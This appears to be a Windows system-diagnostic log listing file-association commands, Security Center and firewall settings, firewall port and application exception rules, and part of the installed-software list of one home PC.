wsffile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
wsffile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
wsffile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
wshfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Bridge] -- C:\Program Files\Adobe\Adobe Bridge CS6 (64 Bit)\Bridge.exe "%L" (Adobe Systems, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
chm.file [open] -- "%SystemRoot%\hh.exe" %1 (Microsoft Corporation)
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htafile [open] -- C:\Windows\SysWOW64\mshta.exe "%1" %* (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
inffile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inffile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
inifile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inifile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
jsfile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsfile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsfile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
jsefile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsefile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsefile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\notepad.exe "%1" (Microsoft Corporation)
regfile [open] -- regedit.exe "%1" (Microsoft Corporation)
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\notepad.exe /p "%1" (Microsoft Corporation)
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" (Microsoft Corporation)
vbefile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbefile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbefile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
vbsfile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbsfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbsfile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
wsffile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
wsffile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
wsffile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
wshfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Bridge] -- C:\Program Files\Adobe\Adobe Bridge CS6 (64 Bit)\Bridge.exe "%L" (Adobe Systems, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
[b]64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
[b]64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[b]64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
[b]64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{059E7468-A643-4C7A-A920-AD8B0BC93E79}" = lport=67 | protocol=17 | dir=in | name=rtldhcp-port |
"{0B3BFE3F-81E2-4EBD-8938-D91ECA48561B}" = lport=138 | protocol=17 | dir=in | app=system |
"{1821813B-F536-483D-8F9C-2C1062213439}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{18743695-EF0D-4320-8A7E-FB98E8609D8A}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{1E7FF0C9-60F7-484B-9D5D-890E492BDFFA}" = rport=138 | protocol=17 | dir=out | app=system |
"{345093AF-C272-46C1-A2A1-A913512436E1}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{3AB503FF-B74F-49CD-B4CD-2DC0C94B6D90}" = rport=139 | protocol=6 | dir=out | app=system |
"{3C08DC29-C795-4B22-8C02-1EB82687E6AD}" = rport=10243 | protocol=6 | dir=out | app=system |
"{417A5657-AC7B-4D2A-B70D-E4ACDC82B527}" = lport=53 | protocol=17 | dir=in | name=rtldns-port-2 |
"{458134DD-3F57-46D5-AA74-112BC8E960F2}" = lport=25565 | protocol=6 | dir=in | name=minecraft tcp |
"{4A1CA537-ED63-4529-8145-67518AFAE285}" = lport=19540 | protocol=17 | dir=in | name=sxuptp |
"{4BEB2358-FE7F-40E1-842F-C57B900F4E03}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{53367043-EF02-45C2-A8C3-6B017D3517E7}" = lport=1542 | protocol=6 | dir=in | name=realtek wps tcp prot |
"{5445CF58-4484-428B-8CB0-C3BDEE1B0C57}" = rport=137 | protocol=17 | dir=out | app=system |
"{569EE2A9-29DC-4921-858A-5CFE31318A46}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{59B3F080-AE72-4CB5-B9CA-45787AF47B4A}" = lport=53 | protocol=17 | dir=in | name=realtek ap udp prot |
"{5A87A549-C9D0-4DEA-AC08-CF75BDE7412D}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{5D9C632A-D783-459D-B1B9-FB55F5C312C5}" = lport=139 | protocol=6 | dir=in | app=system |
"{68938258-4A8A-4BC7-8267-D9BFD4B1EB70}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{6C786A90-9262-4FD2-966D-925499F47E20}" = lport=1542 | protocol=17 | dir=in | name=realtek wps udp prot |
"{7A2568C6-1DE5-4341-80F1-C416AF37A57C}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{7C02BBA7-AF22-4BE9-8149-4A6548076861}" = lport=10243 | protocol=6 | dir=in | app=system |
"{7F47FE26-4B7C-4D45-A769-82CB4D6760EA}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{8419ECE9-62CC-4A01-8098-2D814AC657B8}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{8DA5F2A9-604C-4025-BDB0-390185060AD9}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{98EEA690-E348-4692-8677-C719BA958945}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{99EA1F76-C301-47D2-B8A1-240D73AD031E}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{9C0DEB70-B8CC-4368-BDB5-9CA2C1A6A2A0}" = lport=53 | protocol=6 | dir=in | name=rtldns-port |
"{9CCA4C81-6345-4723-B2CC-7E4101F53834}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{A409909F-06AA-446F-8A83-7AE733A3E00A}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{A5DFBC54-153E-456B-8360-3EB25E169B1B}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{AC9110B3-ECA1-4AE8-B75F-AF3FEB1D86CD}" = lport=137 | protocol=17 | dir=in | app=system |
"{B6151431-67C1-4531-B3C5-B6E941B1B27B}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{B9AD8332-0238-4FDF-820D-B0EEDE8F4EF2}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{C67C7770-58E1-41A7-B4C8-693E8BB87D4B}" = lport=68 | protocol=17 | dir=in | name=rtldhcp-port-2 |
"{CBA7E827-ABED-44EA-9000-D3A3E4EFB633}" = rport=445 | protocol=6 | dir=out | app=system |
"{D1093A38-8BC9-46A9-BFA5-E9584C3113DD}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{D6363730-1A7F-4B5A-9021-C078D7CFF288}" = lport=25565 | protocol=17 | dir=in | name=minecraft udp |
"{DCC92304-0BBC-457C-B623-06547D407229}" = lport=445 | protocol=6 | dir=in | app=system |
"{DDD7FDB4-84B0-4EC3-9636-865D2C784186}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | [email protected],-28539 |
"{E2C8B107-63EA-4604-AABC-DEF214D73605}" = lport=2869 | protocol=6 | dir=in | app=system |
"{ED99B387-4260-49FE-8049-78C4A81C082D}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{FDF5D11C-4B7A-43EC-8A7C-D2A68C47607B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02481C02-AE13-4835-800D-6E5B4D5AE768}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{041E5738-5E02-4B3C-86B5-E7F9DB710F11}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgnsa.exe |
"{05FFC5B4-D77B-4C8E-AA40-F5ED767955AF}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe |
"{06977ABB-50F5-414B-A0AE-600778ADB18D}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgemca.exe |
"{0836E0C7-5CB1-4D85-8557-7CBBB400147E}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{0CF940B7-CF16-4B75-93D7-3022E2B789EC}" = protocol=6 | dir=in | app=c:\udk\udk-2013-02\binaries\win64\udk.exe |
"{0E8CC433-9C46-43AB-B960-F07D3AA86AC8}" = protocol=17 | dir=in | app=c:\udk\udk-2013-02\binaries\win64\udk.exe |
"{111CA3B9-1187-4EB0-8CD6-DBA77C3D975C}" = protocol=58 | dir=out | [email protected],-28546 |
"{12651650-F126-4229-89C1-EABF6BD3D7A3}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{1272EAFB-F0A1-4BE1-811A-7733CB16BAC3}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hposid01.exe |
"{14308CB8-0B33-444A-AD39-1512C7E31148}" = protocol=1 | dir=out | [email protected],-28544 |
"{14899002-C404-4099-B267-6161EF8B4B2C}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgdiagex.exe |
"{16C8BDB5-EB60-4CC2-8063-721394CF1CB4}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpofxm08.exe |
"{193F0D28-7200-43C0-928A-8D5B54318A4F}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgh.exe |
"{19EC0F7E-7D90-445E-A544-BE13828C78A4}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hposfx08.exe |
"{1A0556F1-D04F-4F87-9F54-40C70CD31210}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{1BCAC28F-7EF0-4A73-9F85-066DF66596D2}" = protocol=6 | dir=in | app=c:\program files (x86)\realtek\11n usb wireless lan utility\rtwlan.exe |
"{1D102693-EC80-4862-A9E6-A8C1B464B987}" = protocol=6 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"{1D32E893-92C2-4199-A238-51AAC09C1765}" = protocol=6 | dir=in | app=c:\users\cochran\appdata\roaming\utorrent\utorrent.exe |
"{1D74A973-D61E-4571-AB96-CD8446A2E98E}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{2630582E-2172-4FD6-A91A-8E5FF90040AC}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe |
"{2850C1E6-8247-4576-98D6-163E60151934}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgplgtupl.exe |
"{2892EC8F-9A77-43C0-94BD-1E7F2DC28FAF}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqfxt08.exe |
"{2BBA8CBD-7CA7-4E9C-A513-EDC589B8A50D}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{2C462D70-7B79-4248-96B6-3EF3BB5D0B48}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{3306E7C8-B417-490D-8B24-D51B8204B3B0}" = protocol=6 | dir=in | app=c:\udk\udk-2013-02\binaries\win32\udk.exe |
"{33FC7B0D-6863-419D-8380-495484AFC947}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqste08.exe |
"{36DE298D-5B0B-4838-8DF3-A3BDC6EC11B4}" = dir=in | app=c:\program files (x86)\hp\digital imaging\smart web printing\smartwebprintexe.exe |
"{377610C4-B60C-446B-9DE0-087F154E16E9}" = protocol=17 | dir=in | app=c:\udk\udk-2013-02\binaries\win32\udk.exe |
"{37A6F582-637B-48F7-95DE-8F8EDF6A112F}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe |
"{392DA784-24A1-417C-84CA-A6725D311356}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgemca.exe |
"{3A05F0B2-B7B4-4125-B2B3-8C3F99E10188}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgnsa.exe |
"{42B9F85B-63A4-4EE0-BF82-52DAEF684FD5}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe |
"{436A9397-DF42-48D3-AE1F-B983375F514A}" = protocol=1 | dir=in | [email protected],-28543 |
"{436E3AF5-6085-4FFE-890A-9AD756CC8811}" = protocol=58 | dir=in | [email protected],-28545 |
"{487E5630-8280-4CC2-86EA-A0C4A1C8EA15}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{48EF0E9A-9E8F-4F5D-BAD7-F441B9B57CB1}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\specops_theline\binaries\win32\specopstheline.exe |
"{4B6622C2-EA92-4EAC-8B1B-5A34D4314E2B}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\mp\builds\binaries\bioshock2launcher.exe |
"{4D8F8646-276B-48A0-8326-A340F8A9BEA3}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\sp\builds\binaries\bioshock2launcher.exe |
"{4E05B2C6-9779-427D-B17D-D035DEFB10C9}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqtra08.exe |
"{51B54F6B-EA4A-49AB-95EC-9D3D7EA90F38}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe |
"{51FBD7B6-E253-41B9-8CBA-1EB6AD532609}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{57993C5C-B0A1-4D24-8ED2-0D6B819FCBBE}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock\builds\release\bioshock.exe |
"{5A04CB64-C693-4282-9B24-78F5EA20EEBB}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{5F097039-13B1-45BE-AF1C-4C9A2754A307}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{6435CD38-1FA7-4509-A4B1-85191F6A79F1}" = protocol=6 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{6CE7CE11-52CA-4827-918F-459F061A9E03}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgm.exe |
"{6F12DFC7-30DC-4809-98DC-DC25ABC327A3}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{72463540-7DD4-4617-A787-0CE3E8D25510}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{7B3F996C-235C-4846-A3A8-04989C947D27}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{7D7F1AC4-5DDA-436C-8917-757A5BD5BC05}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{7DD745A0-5102-45AF-98AA-C8E231C4947E}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{84639E2C-A7E7-4BB0-A33D-8EC4EF038F10}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{8706E0F8-B04D-4372-AC8A-0EC3BCDE4B68}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqkygrp.exe |
"{87AEFDF2-BA84-4022-9A0A-34E85B2D4D2C}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\mp\builds\binaries\bioshock2launcher.exe |
"{8B08B3A2-B710-4CA8-AA39-4F87F6BCCD8F}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{8D2F3C00-DCB3-49CA-AEEC-957D3E8FA73D}" = dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{9266290E-FBEA-4796-BF8D-496DBEF67912}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{94E45DA4-DFEF-4D4F-9BF4-31B1F85858AC}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\specops_theline\binaries\win32\specopstheline.exe |
"{99301C6E-E690-42C9-AA57-3115F184D9B8}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{9A735FBA-1DDD-42E4-B5A4-94845F7E0A76}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe |
"{9BD17BCC-CA47-4F6D-B834-CCF6E8B8047C}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{9DA440E1-8A09-4D84-B43C-77B4F72293B2}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpofxs08.exe |
"{9DFC7EEF-BCB1-4A6E-A42E-0347AFC466D1}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpoews01.exe |
"{A4ED0307-A44B-4EDA-94BF-E90401A7ADA2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{A7A76560-0B4F-4511-BB1D-46B97E9A7B62}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{A8075963-95A9-4CE5-93EC-5B8015776203}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{B9350A14-AFB9-44F4-A538-761ACE3CFB9B}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpzwiz01.exe |
"{BE634C7A-A0AC-4299-B96E-BC314ADA0DBD}" = protocol=17 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{C1D4E60F-DF8E-4383-81D1-552B2979A2DE}" = dir=in | app=c:\program files\belkin\belkin usb print and storage center\connect.exe |
"{C4AE5787-1CA8-49C2-B0C2-0A80A244F574}" = protocol=17 | dir=in | app=c:\users\cochran\appdata\roaming\utorrent\utorrent.exe |
"{C53218C9-275F-4074-972C-6869B8AB361F}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\sp\builds\binaries\bioshock2launcher.exe |
"{C66955FD-DBC0-4C59-88B8-5E472F6B1999}" = protocol=17 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"{CAED9D9F-DC79-452C-8F96-7A4217AFCF03}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{CB8371BA-2B04-4A43-8155-8A72ECD178D4}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{CBC3EA5C-B046-44DB-9A6C-372D0B5A80FE}" = protocol=17 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{CE548A16-B694-4540-A277-86F890D8018D}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgdiagex.exe |
"{D04A221A-C680-441C-A789-89232DDDE5A8}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{D2CF5FAE-68F6-480A-A273-FEC5D150993B}" = dir=in | app=c:\program files (x86)\hp\hp software update\hpwucli.exe |
"{D3EF6A45-C95C-4C88-A1C1-117F0BDD6BA9}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe |
"{D701A41A-F213-409D-9567-DA754E97E014}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock\builds\release\bioshock.exe |
"{E6CB6C65-7DFF-4DD3-B2BB-10C1B3C5C3B2}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpfccopy.exe |
"{E76300C6-BA5C-4A0A-9995-0CAF44C86987}" = protocol=17 | dir=in | app=c:\program files (x86)\realtek\11n usb wireless lan utility\rtwlan.exe |
"{EC85E556-439B-4543-B22C-157961729B97}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe |
"{EF501551-CFF4-4BDC-B0DC-7134731E73B6}" = protocol=6 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{F1DAD188-F962-4283-BB6F-5CA5C249CF62}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{F4F6EEF2-6084-4C1F-A6A7-960073C275AC}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgpc01.exe |
"{FB4DA1D9-C461-4686-BFB8-14504CD52C4E}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpiscnapp.exe |
"{FF01A1AB-48AA-453A-BD6B-A2665FCB72CD}" = protocol=6 | dir=out | app=system |
"TCP Query User{3802FE4E-DE09-4645-A203-7F9E15A82858}C:\program files\java\jre7\bin\javaw.exe" = protocol=6 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"TCP Query User{E10065EB-D119-437D-B9D0-43A9224074D9}C:\program files (x86)\ea games\dead space 2\deadspace2.exe" = protocol=6 | dir=in | app=c:\program files (x86)\ea games\dead space 2\deadspace2.exe |
"TCP Query User{F08758BF-4903-4BFB-B15A-B3889F97ADED}C:\program files (x86)\unity\editor\unity.exe" = protocol=6 | dir=in | app=c:\program files (x86)\unity\editor\unity.exe |
"UDP Query User{69F3CAE0-816B-4996-A61F-4A23B76B96EE}C:\program files\java\jre7\bin\javaw.exe" = protocol=17 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"UDP Query User{9B97057C-B7AB-44A1-9079-EBBC0B5216F0}C:\program files (x86)\unity\editor\unity.exe" = protocol=17 | dir=in | app=c:\program files (x86)\unity\editor\unity.exe |
"UDP Query User{DC623097-0454-4FBD-A0AE-9293F96A4A5D}C:\program files (x86)\ea games\dead space 2\deadspace2.exe" = protocol=17 | dir=in | app=c:\program files (x86)\ea games\dead space 2\deadspace2.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0B8565BA-BAD5-4732-B122-5FD78EFC50A9}" = Native Instruments Service Center
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{21B133D6-5979-47F0-BE1C-F6A6B304693F}" = Visual Studio 2010 x64 Redistributables
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{26A24AE4-039D-4CA4-87B4-2F86417011FF}" = Java 7 Update 11 (64-bit)
"{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1" = MotioninJoy Gamepad tool 0.7.1001
"{491DF203-7B61-4F0E-BDCB-A1218C4DAFE9}" = Native Instruments Massive
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{537F3172-82F9-44D7-99E6-8B4428F1CDAF}" = AVG 2014
"{55D55008-E5F6-47D6-B16F-B2A40D4D145F}" = 64 Bit HP CIO Components Installer
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6965A8D2-465D-4F98-9FAA-0E9E2348F329}" = Microsoft LifeCam
